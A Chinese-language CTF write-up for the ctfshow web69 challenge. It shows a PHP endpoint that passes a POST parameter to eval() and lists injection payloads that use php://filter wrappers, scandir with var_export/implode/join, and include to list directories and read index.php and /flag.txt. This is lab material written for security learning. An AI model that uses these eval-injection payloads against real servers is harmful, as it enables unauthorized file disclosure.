[ctfshow web入门] web69

信息收集

使用c=include("php://filter/convert.base64-encode/resource=index.php");读取的index.php

php 复制代码
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

解题

查目录

百度了一下有哪些打印函数,var_export能用

  • var_export() 函数输出或返回有关变量的结构化信息。
    该函数的工作方式与 var_dump() 类似,不同之处在于该函数的返回值是有效的 PHP 代码。
php 复制代码
c=var_export(scandir('.'));

或者换一个思路,用一个函数把array 转成字符串 ,因为我发现printecho没被禁用

php 复制代码
c=echo(implode(', ', scandir('.')));
c=print(join(', ', scandir('.')));

implode(separator,array):implode函数返回一个由数组元素组合成的字符串。

join(separator,array):join函数是implode函数的别名。


读文件

flag不在flag.php,和之前一样,不是本篇重点,不再截图

php 复制代码
c=include("php://filter/convert.iconv.utf8.utf16/resource=flag.php");
c=include("php://filter/convert.base64-encode/resource=flag.php");
php 复制代码
c=var_export(scandir('/'));
c=echo(implode(', ', scandir('/')));
c=print(join(', ', scandir('/')));
php 复制代码
c=include("php://filter/convert.iconv.utf8.utf16/resource=/flag.txt");
c=include("php://filter/convert.base64-encode/resource=/flag.txt");
c=include("/flag.txt");

web68    目录    web70

相关推荐
孤水寒月2 小时前
基于HTML的悬窗可拖动记事本
前端·css·html
祝余呀2 小时前
html初学者第一天
前端·html
一只栖枝3 小时前
网络安全 vs 信息安全的本质解析:数据盾牌与网络防线的辩证关系关系
网络·网络安全·信息安全·it·信息安全认证
安全系统学习3 小时前
【网络安全】Mysql注入中锁机制
安全·web安全·网络安全·渗透测试·xss
耶啵奶膘4 小时前
uniapp+firstUI——上传视频组件fui-upload-video
前端·javascript·uni-app
视频砖家5 小时前
移动端Html5播放器按钮变小的问题解决方法
前端·javascript·viewport功能
lyj1689975 小时前
vue-i18n+vscode+vue 多语言使用
前端·vue.js·vscode
怦然星动_6 小时前
DHCP中继及动态分配
网络安全
小白变怪兽7 小时前
一、react18+项目初始化(vite)
前端·react.js
ai小鬼头7 小时前
AIStarter如何快速部署Stable Diffusion?**新手也能轻松上手的AI绘图
前端·后端·github